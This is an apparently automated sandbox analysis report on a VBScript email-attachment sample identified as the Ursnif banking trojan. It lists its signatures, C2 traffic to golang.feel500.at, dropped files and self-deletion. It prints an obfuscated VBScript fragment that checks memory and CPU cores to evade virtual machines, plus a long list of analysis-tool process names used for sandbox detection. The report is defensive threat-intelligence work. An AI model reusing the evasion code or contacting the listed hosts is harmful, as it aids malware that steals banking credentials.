Analysis Report view_attach_72559.vbs

Overview

General Information

Sample Name: view_attach_72559.vbs
Analysis ID: 331433
MD5: 29933320f02dfc13999ff70cd960a291
SHA1: 29db771aef8cfe3231e5f1b077bf49c096777043
SHA256: 7c4f0d072bdbf9aaba20f96173a9274376d589a171ff96d4bfbb56427ea17f7c

Detection

Ursnif
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 88.99.66.31 88.99.66.31
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected:
GET /api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBkab56Bm_2/FWmqnzUOX9_2B0/YbRWfB6IMq7TSr21K5FNM/xWmFuq_2FeEONGMO/1ZuPh_2FNFAeM3T/FM11WlspOeJ_2FqYpl/U_2F6jwXu/YXiyreYoS1UAkST_2FVa/JT_2Fx9W7QvoG6HJsdC/ExFIoNdpiPpyKG7cmJGp40/huNnlqBJ9uVVH/QyyRFE1b/30os8htaDb_2FAitT_2BOsm/SKMxwp3_0A/_0DyvsrFrDpoMB3eg/_2BPhnWhGFuU/FPA93GCv8Zd/FBoszW1uVg1_2B/gtKiRyRf4RAjLF4_2F0P1/_2FR HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: golang.feel500.at
Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: golang.feel500.at
Connection: Keep-Alive
Source: msapplication.xml0.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa58ff2cd,0x01d6d3e3</date><accdate>0xa58ff2cd,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa594b73e,0x01d6d3e3</date><accdate>0xa594b73e,0x01d6d3e3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: iplogger.org
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 16 Dec 2020 19:42:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp String found in binary or memory: http://crl.com
Source: wscript.exe, 00000000.00000003.716624163.000001C8B6063000.00000004.00000001.sdmp String found in binary or memory: http://crl.com9
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: {CFFA0380-3FD6-11EB-90EB-ECF4BBEA1588}.dat.17.dr, ~DFCE3CEB3DA92FCDD0.TMP.17.dr String found in binary or memory: http://golang.feel500.at/api1/DIwBQ8Rv7j7xfqFjg4_2BA9/g0fzfaOWqj/Y_2BPGiAPfzGcs2Be/I_2BUuYEc0ea/KBka
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: msapplication.xml.17.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.17.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.17.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.17.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.17.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.17.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.17.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.17.dr String found in binary or memory: http://www.youtube.com/
Source: wscript.exe, 00000000.00000003.711863605.000001C8B6372000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711756068.000001C8B66D1000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712532222.000001C8B5BEB000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712769407.000001C8B4CF0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/18j267
Source: wscript.exe, 00000000.00000003.711430309.000001C8B676D000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/18j267Nums
Source: wscript.exe, 00000000.00000003.712665350.000001C8B3A16000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1D5y47
Source: wscript.exe, 00000000.00000003.711285112.000001C8B6751000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)
Source: view_attach_72559.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal84.troj.evad.winVBS@4/52@2/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFFA037E-3FD6-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_72559.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5528 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: view_attach_72559.vbs Static file information: File size 1478801 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\valueState\Redparagraph\unitList\Hislay\weight.pdb source: Oxnard.rb.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface:
WScript.Sleep 2000
If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then
Exit Function
End If
' Kankakee blasphemy sunrise bramble screwworm ho religiosity. 8769309 hoot ambitious foppish grandmother tutu widen754 passerby scratchy892 bossy109. Verde274 Byrne. 4049332
Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")
Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_ComputerSystem")
For Each rTSNo In kdDsaHAdlItems
KlcIhm = KlcIhm + Int((rTSNo.TotalPhysicalMemory) / (((81 - 2.0) + (1055520 - 278.0)) - 6745.0))
Next
If KlcIhm < ((8197 - (7235 - 89.0)) - (22 - 1.0)) Then
HThYFgq
' novo Auckland shrewd freedman persecutory thieves745 videotape Vega regent snowy cop cremate committee126 reticulum995 spigot charisma50
End If
REM regress bangle, 8711784 insubstantial359 michigan effectuate Reagan sin770 earmark discriminant notate. purify, conversion571 standeth vane
' sidereal600 evocate dance denude burst automorphism uranium Aldrich diffract stamp Bergland signal groan railway Erik villa Leon commendatory peptide alga
End Function
Function spurn163()
REM afternoon Barnhard230. alga500 whale Britain torso rapture slid indecomposable trudge Filipino. bazaar, big Hahn, cookery guilty debase, 419631 culprit Leland critic lusty cantor pater tate IEEE ceramic, 7701 crunchy verdict. effete, boulder voyage717
on error resume next
If (InStr(WScript.ScriptName, cStr(820652900)) > 0 And uiwkQH = 0) Then
' peak Bethlehem Terre Posner stifle Agee quartermaster204 NH dauphin nomad their neither scarves
Exit Function
REM autocollimate Giuliano attainder isle epidemic longue spoonful ambulant j Cinderella influenza hydrous Finn. Methuselah attune rectitude cervix
End If
Set AlphonseService = GetObject("winmgmts:\\.\root\cimv2")
Set kdDsaHAdlItems = AlphonseService.ExecQuery("Select * from Win32_Processor", , (((4 + 300.0) - 267.0) + (28 - 17.0)))
' Kelvin scoff castor niece bump fiefdom491 lap sing thieving yearbook hydroxide. milestone rule. regrettable, vivify. 2683417 Lausanne ounce complain
For Each rTSNo In kdDsaHAdlItems
' roundworm glad capitol beachhead. nay Malthus replica. acquaint ampere iodine vermilion saw
If rTSNo.NumberOfCores < ((25 - (22 - (15 - 13.0))) - 2.0) Then
chaotic = True
' bipolar dodecahedral518 indium polysemous documentation262 capacitance tine thicken stature crest187 petition adject spectrography polymeric howdy. sheave taft112 indubitable, conjuncture near
End If
Next
If chaotic Then
' industrial Allegheny bedstraw bestubble variety hornmouth Wilshire813 impute281 audiotape circumsphere retrofit botanic197 cotty caught grouse county irreverent. 7472456 nursery concertina. 7200157 Rena. 6227331 adipic tetravalent. 3544323 typeset bronco python possessor383 boil, spasm377 Carl
HThYFgq
End If
REM shenanigan tenebrous Borden Peruvian jackpot966 eke GU whatnot Burr Netherlands permafrost. 3030829 autocorrelate nectar recipe game hazel kayo Bose thereby blew extra
End Function
Function tUtsn(PKdEVC)
on error resum

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Oxnard.rb
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Oxnard.rb

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\view_attach_72559.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXEH
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.712764101.000001C8B3A55000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Oxnard.rb
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5588 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: wscript.exe, 00000000.00000003.711820977.000001C8B6690000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.711801004.000001C8B6389000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWa

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: Oxnard.rb.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 88.99.66.31 187

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\prestige.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.712789236.000001C8B3A2A000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.712694780.000001C8B3A4B000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841100047.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000007.00000003.841219747.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841280724.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.844945859.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841043510.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841145092.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841189737.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841251106.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.841003286.0000000004DC8000.00000004.00000040.sdmp, type: MEMORY
